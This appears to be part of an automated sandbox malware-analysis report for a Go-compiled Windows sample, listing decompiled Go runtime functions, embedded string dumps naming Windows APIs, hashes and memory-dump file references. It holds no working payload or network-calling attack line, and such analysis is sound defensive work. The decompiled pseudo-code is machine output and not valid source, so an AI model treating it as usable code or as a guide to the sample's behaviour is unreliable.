                                                                                                                            • String ID: found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengt$), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$+,-./0:<=?CLMPSZ[\$basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimb$greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: create$marking free objectmarkroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 s$runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foundtoo many open files in syste
                                                                                                                            • API String ID: 0-3436063708
                                                                                                                            • Opcode ID: 8a1d3214de8a8e87167d236f63d6a23126ad5619931379a3909adb8435b4c374
                                                                                                                            • Instruction ID: 90d7b0ce9ab2b8ebce0de3e44dbfbceb83cfedc2de30e9dd4e8bdeba9ec865d9
                                                                                                                            • Opcode Fuzzy Hash: 8a1d3214de8a8e87167d236f63d6a23126ad5619931379a3909adb8435b4c374
                                                                                                                            • Instruction Fuzzy Hash: 1F71CEB2615BC087DB089B19E44039ABB65F795B98F845522EF8E03B69CF3CC554C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AB4170 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4095668141-0
                                                                                                                            • Opcode ID: f0fbca43124e56be12df08e0cd312879f0442a09289fe575c61c557e2b503b29
                                                                                                                            • Instruction ID: 0c36a390a5b570bb56ac1624505e6e709889eccf60392e68518d0a26f0e710a5
                                                                                                                            • Opcode Fuzzy Hash: f0fbca43124e56be12df08e0cd312879f0442a09289fe575c61c557e2b503b29
                                                                                                                            • Instruction Fuzzy Hash: 6D510631618F094FEF5A9B689C497B973D0FB49321F60012DF84AC3697EB30E85286D9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01351840 Relevance: 8.9, Strings: 7, Instructions: 154COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E01351840(intOrPtr __ebx, void* __edx, void* __edi, void* __esp, long long __rax, void* __rdi, void* __rsi, long long __rbp, void* __r8, void* __r14, long long _a8, intOrPtr _a16) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				void* _t43;
				void* _t46;
				void* _t48;
				void* _t76;
				intOrPtr _t77;
				void* _t91;
				void* _t92;
				void* _t94;
				long long _t104;
				long long _t115;
				long long _t132;
				long long _t133;
				intOrPtr _t134;
				long long _t135;
				void* _t137;
				void* _t138;
				void* _t145;
				void* _t151;
				void* _t152;

				L0:
				while(1) {
					L0:
					_t152 = __r14;
					_t151 = __r8;
					_t140 = __rbp;
					_t138 = __rsi;
					_t137 = __rdi;
					_t104 = __rax;
					_t94 = __esp;
					_t92 = __edi;
					_t91 = __edx;
					_t77 = __ebx;
					if(_t145 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L23;
					}
					L1:
					_v8 = __rbp;
					_t140 =  &_v8;
					if(__ebx == 0 || __ebx == 0xffffffff) {
						L4:
						return 0;
					} else {
						L3:
						_t132 = 0x146a760;
						L6:
						while(_t132 != 0) {
							if( *((intOrPtr*)(_t132 + 0x118)) > _t104 ||  *((intOrPtr*)(_t132 + 0x120)) <= _t104) {
								L5:
								_t132 =  *((intOrPtr*)(_t132 + 0x220));
								continue;
							}
							L11:
							_a16 = _t77;
							if(_t132 == 0) {
								L16:
								_v56 = _t104;
								_t46 = E01309600(0x147b660, _t135, _t140, _t152);
								_t131 =  *0x147b670; // 0x0
								_t90 = _a16;
								L0130D720(_t46, _a16, 0x137afc0, _t131, _t137, _t138, _t140, _t151, _t152);
								_t133 =  *0x137afc0;
								_v32 = _t133;
								_t48 = E01309820(0x147b660, _t140, _t152);
								if(_v32 != 0) {
									L18:
									return _t48;
								} else {
									L17:
									E01332340(_t135, _t140, _t152);
									E01332C40(_t90, _t92, _t93, _t94, 0x1388ca7, _t131, _t140, _t152);
									L01332AA0(_t91, _t92, _t94, _a16, _t133, _t140, _t152);
									E01332C40(_t90, _t92, _t93, _t94, 0x1386ba5, _t131, _t140, _t152);
									L01332AA0(_t91, _t92, _t94, _v56, _t133, _t140, _t152);
									E01332C40(_t90, _t92, _t93, _t94, 0x1388680, _t131, _t140, _t152);
									L013323C0(_t135, _t140, _t152);
									_t115 = 0x146a760;
									L20:
									while(_t115 != 0) {
										_v24 = _t115;
										_t133 =  *((intOrPtr*)(_t115 + 0x118));
										_v40 = _t133;
										_t135 =  *((intOrPtr*)(_t115 + 0x120));
										_v48 = _t135;
										E01332340(_t135, _t140, _t152);
										E01332C40(_t90, _t92, _t93, _t94, 0x1386ea8, _t131, _t140, _t152);
										L01332AA0(_t91, _t92, _t94, _v40, _t133, _t140, _t152);
										E01332C40(_t90, _t92, _t93, _t94, 0x1386f35, _t131, _t140, _t152);
										L01332AA0(_t91, _t92, _t94, _v48, _t133, _t140, _t152);
										E013325A0(_t90, _t91, _t92, _t93, _t94, _t140, _t152);
										L013323C0(_t135, _t140, _t152);
										_t115 =  *((intOrPtr*)(_v24 + 0x220));
									}
									E01330BA0(0x138e2d0, _t131, _t140);
									goto L22;
								}
							} else {
								L12:
								_v16 = _t132;
								_t93 = _t77;
								_t131 =  *((intOrPtr*)(_t132 + 0x210));
								_t90 = _t77;
								_t76 = L0130D720(_t43, _t77, 0x137b080,  *((intOrPtr*)(_t132 + 0x210)), _t137, _t138, _t140, _t151, _t152);
								if( *0x137b080 != 0) {
									L15:
									return _t76;
								} else {
									L13:
									_t134 = _v16;
									_t135 =  *((intOrPtr*)(_t134 + 0x118));
									_t133 =  *((intOrPtr*)(_t134 + 0x120));
									if(_t133 < _t135 + _a16) {
										L22:
										_v40 = _t135;
										_v48 = _t133;
										E01332340(_t135, _t140, _t152);
										E01332C40(_t90, _t92, _t93, _t94, 0x1388ca7, _t131, _t140, _t152);
										L01332AA0(_t91, _t92, _t94, _a16, _t133, _t140, _t152);
										E01332C40(_t90, _t92, _t93, _t94, 0x13880ac, _t131, _t140, _t152);
										L01332AA0(_t91, _t92, _t94, _v40, _t133, _t140, _t152);
										E01332C40(_t90, _t92, _t93, _t94, 0x138681e, _t131, _t140, _t152);
										L01332AA0(_t91, _t92, _t94, _v48, _t133, _t140, _t152);
										E013325A0(_t90, _t91, _t92, _t93, _t94, _t140, _t152);
										L013323C0(_t135, _t140, _t152);
										_t104 = 0x138cb02;
										_t77 = 0x21;
										E01330BA0(0x138cb02, _t131, _t140);
										goto L23;
									} else {
										L14:
										return _t76;
									}
								}
							}
							goto L24;
						}
						goto L11;
					}
					L24:
					L23:
					_a8 = _t104;
					_a16 = _t77;
					E01356200(_t135, _t140);
				}
			}





























                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351840
                                                                                                                            0x01351844
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0135184a
                                                                                                                            0x0135184e
                                                                                                                            0x01351853
                                                                                                                            0x0135185a
                                                                                                                            0x0135186e
                                                                                                                            0x01351879
                                                                                                                            0x01351865
                                                                                                                            0x01351865
                                                                                                                            0x01351865
                                                                                                                            0x00000000
                                                                                                                            0x01351881
                                                                                                                            0x0135188d
                                                                                                                            0x0135187a
                                                                                                                            0x0135187a
                                                                                                                            0x00000000
                                                                                                                            0x0135187a
                                                                                                                            0x0135189c
                                                                                                                            0x0135189c
                                                                                                                            0x013518a3
                                                                                                                            0x01351908
                                                                                                                            0x01351908
                                                                                                                            0x01351917
                                                                                                                            0x0135191c
                                                                                                                            0x0135192a
                                                                                                                            0x0135192e
                                                                                                                            0x01351933
                                                                                                                            0x01351936
                                                                                                                            0x01351945
                                                                                                                            0x01351952
                                                                                                                            0x013519b3
                                                                                                                            0x013519bc
                                                                                                                            0x01351954
                                                                                                                            0x01351954
                                                                                                                            0x01351954
                                                                                                                            0x01351965
                                                                                                                            0x01351971
                                                                                                                            0x01351982
                                                                                                                            0x0135198c
                                                                                                                            0x013519a0
                                                                                                                            0x013519a5
                                                                                                                            0x013519aa
                                                                                                                            0x00000000
                                                                                                                            0x01351a2b
                                                                                                                            0x013519bd
                                                                                                                            0x013519c2
                                                                                                                            0x013519c9
                                                                                                                            0x013519ce
                                                                                                                            0x013519d5
                                                                                                                            0x013519da
                                                                                                                            0x013519eb
                                                                                                                            0x013519f5
                                                                                                                            0x01351a06
                                                                                                                            0x01351a10
                                                                                                                            0x01351a15
                                                                                                                            0x01351a1a
                                                                                                                            0x01351a24
                                                                                                                            0x01351a24
                                                                                                                            0x01351a40
                                                                                                                            0x00000000
                                                                                                                            0x01351a40
                                                                                                                            0x013518a5
                                                                                                                            0x013518a5
                                                                                                                            0x013518a5
                                                                                                                            0x013518b8
                                                                                                                            0x013518ba
                                                                                                                            0x013518bd
                                                                                                                            0x013518c0
                                                                                                                            0x013518cb
                                                                                                                            0x013518fe
                                                                                                                            0x01351907
                                                                                                                            0x013518cd
                                                                                                                            0x013518cd
                                                                                                                            0x013518cd
                                                                                                                            0x013518d2
                                                                                                                            0x013518e4
                                                                                                                            0x013518ee
                                                                                                                            0x01351a45
                                                                                                                            0x01351a45
                                                                                                                            0x01351a4a
                                                                                                                            0x01351a4f
                                                                                                                            0x01351a60
                                                                                                                            0x01351a6c
                                                                                                                            0x01351a80
                                                                                                                            0x01351a8a
                                                                                                                            0x01351aa0
                                                                                                                            0x01351aaa
                                                                                                                            0x01351aaf
                                                                                                                            0x01351ab4
                                                                                                                            0x01351ab9
                                                                                                                            0x01351ac0
                                                                                                                            0x01351ac5
                                                                                                                            0x00000000
                                                                                                                            0x013518f4
                                                                                                                            0x013518f4
                                                                                                                            0x013518fd
                                                                                                                            0x013518fd
                                                                                                                            0x013518ee
                                                                                                                            0x013518cb
                                                                                                                            0x00000000
                                                                                                                            0x013518a3
                                                                                                                            0x00000000
                                                                                                                            0x0135189a
                                                                                                                            0x00000000
                                                                                                                            0x01351acb
                                                                                                                            0x01351acb
                                                                                                                            0x01351ad0
                                                                                                                            0x01351ad4
                                                                                                                            0x01351ade

                                                                                                                            Strings
                                                                                                                            • runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesP has cached GC work at end of, xrefs: 01351A30
                                                                                                                            • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe, xrefs: 01351976
                                                                                                                            • out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_, xrefs: 01351A71
                                                                                                                            • runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard Tim, xrefs: 01351959, 01351A54
                                                                                                                            • types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia, xrefs: 013519DF
                                                                                                                            • not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero, xrefs: 01351991
                                                                                                                            • runtime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many levels of symbolic linksOther_Default_Ignorable_Code_PointSetFileCompletionNotificatio, xrefs: 01351AB9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe$ not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero$ out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_$runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesP has cached GC work at end of$runtime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many levels of symbolic linksOther_Default_Ignorable_Code_PointSetFileCompletionNotificatio$runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard Tim
                                                                                                                            • API String ID: 0-3946913466
                                                                                                                            • Opcode ID: 85cc3400a3144445944795422dc2c6bfdf3790eb7f66a1497c305b8cadb76c3a
                                                                                                                            • Instruction ID: ecc2eebdef999e3a8efd111ae751f4650f5d5f648b2d487f09e09c808ac7f022
                                                                                                                            • Opcode Fuzzy Hash: 85cc3400a3144445944795422dc2c6bfdf3790eb7f66a1497c305b8cadb76c3a
                                                                                                                            • Instruction Fuzzy Hash: 71514536315B85CAEB24EB58E4803AAB7B4FB98B88F844131EB8D03775DF38C5418754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A63570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2761444284-0
                                                                                                                            • Opcode ID: 8dc90ca19aaec31e348d566872eeb8a50e4c193b26218b7fab70ade35e01bdf8
                                                                                                                            • Instruction ID: 5c795be894506392cd3015ed175de2a266b6f7c74a535287f08be2d68e70ee98
                                                                                                                            • Opcode Fuzzy Hash: 8dc90ca19aaec31e348d566872eeb8a50e4c193b26218b7fab70ade35e01bdf8
                                                                                                                            • Instruction Fuzzy Hash: 4A41F127300F8297EE569B229D5C2AEA790F705BA2FA44025FE0607F55DF38C427C728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0131EAA0 Relevance: 8.8, Strings: 7, Instructions: 91COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E0131EAA0(intOrPtr __ebx, char __ecx, void* __edx, void* __rdx, long long __rbp, void* __r14, long long _a8, intOrPtr _a16, char _a20) {
				char _v8;
				unsigned int _v16;
				long long _v24;
				long long _v40;
				void* _t25;
				intOrPtr _t36;
				char _t44;
				void* _t46;
				signed int _t47;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t55;
				long long _t56;
				long long _t59;
				long long _t71;
				unsigned int _t72;
				void* _t74;
				long long _t75;
				void* _t76;
				void* _t80;
				void* _t84;

				L0:
				while(1) {
					L0:
					_t84 = __r14;
					_t77 = __rbp;
					_t74 = __rdx;
					_t44 = __ecx;
					_t36 = __ebx;
					if(_t80 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L13;
					}
					L1:
					_v8 = __rbp;
					_t77 =  &_v8;
					_t55 =  *0x14a16f0 - _t36; // 0x0
					if(_t55 == 0) {
						while(1) {
							L4:
							_t46 =  *_t56;
							_t50 = _t46;
							asm("btr ecx, 0x1f");
							_t44 = _t46 - 1;
							asm("o16 nop [eax+eax]");
							__eflags = _t44 - 0x80000000;
							if(__eflags >= 0) {
								break;
							}
							L5:
							_t47 = _t74 - 1;
							_t71 = _t56;
							_t25 = _t50;
							asm("lock cmpxchg [ebx], ecx");
							_t48 = _t47 & 0xffffff00 | __eflags == 0x00000000;
							if(__eflags == 0) {
								L3:
								_t56 = _t71;
								continue;
							}
							L6:
							__eflags = _t50 - 0x80000000;
							if(_t50 != 0x80000000) {
								return _t25;
							} else {
								__eflags =  *0x14cf790;
								if( *0x14cf790 > 0) {
									_t59 =  *0x14a1718; // 0x0
									_v40 = _t59;
									_t72 =  *0x14cfcd8; // 0x2b0000
									_v16 = _t72;
									_t75 =  *0x14a1728; // 0x0
									_v24 = _t75;
									asm("movsd xmm0, [0x182beb]");
									asm("movsd [esp+0x18], xmm0");
									E01332340(_t75, _t77, _t84);
									E01332C40(_t48, _t51, _t52, _t53, 0x138c439, _t71, _t77, _t84);
									E01332940(_t51, _t52, _t53, _v16 >> 0x14, _t72, _t77, _t84);
									E01332C40(_t48, _t51, _t52, _t53, 0x138817e, _t71, _t77, _t84);
									_t73 = _v24;
									__eflags = _v16 - _v24 >> 0x14;
									E01332940(_t51, _t52, _t53, _v16 - _v24 >> 0x14, _v24, _t77, _t84);
									E01332C40(_t48, _t51, _t52, _t53, 0x138a4be, _t71, _t77, _t84);
									E01332940(_t51, _t52, _t53, _v40, _v24, _t77, _t84);
									E01332C40(_t48, _t51, _t52, _t53, 0x1387416, _t71, _t77, _t84);
									asm("movsd xmm0, [esp+0x18]");
									L01332640(_t48, _t51, _t52, _t53, _t71, _t73, _t75, _t76, _t77, _t84);
									E01332C40(_t48, _t51, _t52, _t53, 0x1387a94, _t71, _t77, _t84);
									_t25 = L013323C0(_t75, _t77, _t84);
								}
								return _t25;
							}
						}
						L11:
						E01330BA0(0x138ce97, _t71, _t77);
						L12:
						_t56 = 0x138e7a9;
						_t36 = 0x31;
						E01330BA0(0x138e7a9, _t71, _t77);
						goto L13;
					}
					L2:
					goto L12;
					L13:
					_a8 = _t56;
					_a16 = _t36;
					_a20 = _t44;
					E01356200(_t74, _t77);
				}
			}


























                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa0
                                                                                                                            0x0131eaa4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131eaaa
                                                                                                                            0x0131eaae
                                                                                                                            0x0131eab3
                                                                                                                            0x0131eac0
                                                                                                                            0x0131eac6
                                                                                                                            0x0131ead0
                                                                                                                            0x0131ead0
                                                                                                                            0x0131ead0
                                                                                                                            0x0131ead2
                                                                                                                            0x0131ead4
                                                                                                                            0x0131ead8
                                                                                                                            0x0131eada
                                                                                                                            0x0131eae0
                                                                                                                            0x0131eae6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131eaec
                                                                                                                            0x0131eaec
                                                                                                                            0x0131eaef
                                                                                                                            0x0131eaf2
                                                                                                                            0x0131eaf4
                                                                                                                            0x0131eaf8
                                                                                                                            0x0131eafd
                                                                                                                            0x0131eacd
                                                                                                                            0x0131eacd
                                                                                                                            0x00000000
                                                                                                                            0x0131eacd
                                                                                                                            0x0131eb00
                                                                                                                            0x0131eb00
                                                                                                                            0x0131eb06
                                                                                                                            0x0131ebfd
                                                                                                                            0x0131eb0c
                                                                                                                            0x0131eb0c
                                                                                                                            0x0131eb13
                                                                                                                            0x0131eb19
                                                                                                                            0x0131eb20
                                                                                                                            0x0131eb25
                                                                                                                            0x0131eb2c
                                                                                                                            0x0131eb31
                                                                                                                            0x0131eb38
                                                                                                                            0x0131eb3d
                                                                                                                            0x0131eb45
                                                                                                                            0x0131eb4b
                                                                                                                            0x0131eb60
                                                                                                                            0x0131eb6e
                                                                                                                            0x0131eb80
                                                                                                                            0x0131eb8a
                                                                                                                            0x0131eb92
                                                                                                                            0x0131eb96
                                                                                                                            0x0131eba7
                                                                                                                            0x0131ebb1
                                                                                                                            0x0131ebc2
                                                                                                                            0x0131ebc7
                                                                                                                            0x0131ebcd
                                                                                                                            0x0131ebe0
                                                                                                                            0x0131ebe5
                                                                                                                            0x0131ebe5
                                                                                                                            0x0131ebf3
                                                                                                                            0x0131ebf3
                                                                                                                            0x0131eb06
                                                                                                                            0x0131ebfe
                                                                                                                            0x0131ec0a
                                                                                                                            0x0131ec0f
                                                                                                                            0x0131ec0f
                                                                                                                            0x0131ec16
                                                                                                                            0x0131ec20
                                                                                                                            0x00000000
                                                                                                                            0x0131ec20
                                                                                                                            0x0131eac8
                                                                                                                            0x00000000
                                                                                                                            0x0131ec26
                                                                                                                            0x0131ec26
                                                                                                                            0x0131ec2b
                                                                                                                            0x0131ec2f
                                                                                                                            0x0131ec33
                                                                                                                            0x0131ec41

                                                                                                                            Strings
                                                                                                                            • sweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: un, xrefs: 0131EC0F
                                                                                                                            • pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGetIfEntry, xrefs: 0131EBB6
                                                                                                                            • pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_M, xrefs: 0131EBD2
                                                                                                                            • mismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=traceback did not unwind completelytransport endpo, xrefs: 0131EBFE
                                                                                                                            • pacer: sweep done at heap size pattern contains path separatorresetspinning: not a spinning mruntime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from, xrefs: 0131EB50
                                                                                                                            • MB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRegSetValueExWSetFilePointerTranslateNameWallocfreetracebad allocCountbad restart PCbad span statefile too largefinalizer waitgcstoptheworldgetprotobynameinvalid syntaxis a dir, xrefs: 0131EB73
                                                                                                                            • MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointQyzylorda Standard TimeSetEnvironmentVariableWSingapore Standard TimeSri Lanka Standard TimeTocantins Standard TimeVenezuela Standard TimeVolgograd Standard TimeW. Euro, xrefs: 0131EB9B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
